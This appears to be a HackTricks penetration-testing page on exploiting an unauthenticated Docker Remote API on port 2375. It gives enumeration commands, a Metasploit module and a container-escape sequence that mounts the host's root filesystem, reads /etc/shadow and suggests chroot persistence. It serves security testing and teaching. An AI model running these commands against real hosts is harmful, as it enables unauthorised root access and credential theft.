hacktricks/pentesting/2375-pentesting-docker.md
2020-12-15 09:18:43 +00:00
# 2375 Pentesting Docker
## 2375 - Pentesting Docker API
### Basic Information
When the Docker daemon is configured to listen on TCP, its Remote API is exposed on port 2375 by default (2376 is the conventional port when TLS is enabled). The plain-TCP listener requires no authentication, so anyone who can reach the port can start a privileged container. Through the Remote API an attacker can bind-mount the host's `/` (root directory) into that container and read or write any file on the host, which is equivalent to root on the host.
**Default port:** 2375
```text
PORT STATE SERVICE
2375/tcp open docker
```
### Enumeration
```bash
# Version detection plus the docker-* NSE scripts (e.g. docker-version)
nmap -sV --script "docker-*" -p <PORT> <IP>
# Metasploit module that abuses an unauthenticated daemon
msf> use exploit/linux/http/docker_daemon_tcp
```
### Exploitation
Check whether the daemon lets you execute arbitrary code on the host by starting a privileged container in the host network namespace with the host's root filesystem mounted at `/mnt`:
```bash
# Runs on the attacker machine: the docker CLI talks to the remote daemon
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
# Runs inside the container: the host's filesystem is under /mnt
cat /mnt/etc/shadow
```
From that shell, `chroot /mnt` gives you a root shell on the host's filesystem, so anything from adding an SSH key to dropping a cron job is possible. The same sequence (create container, start it, exec a command) is also reachable with plain HTTP requests if the `docker` client is not available.
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)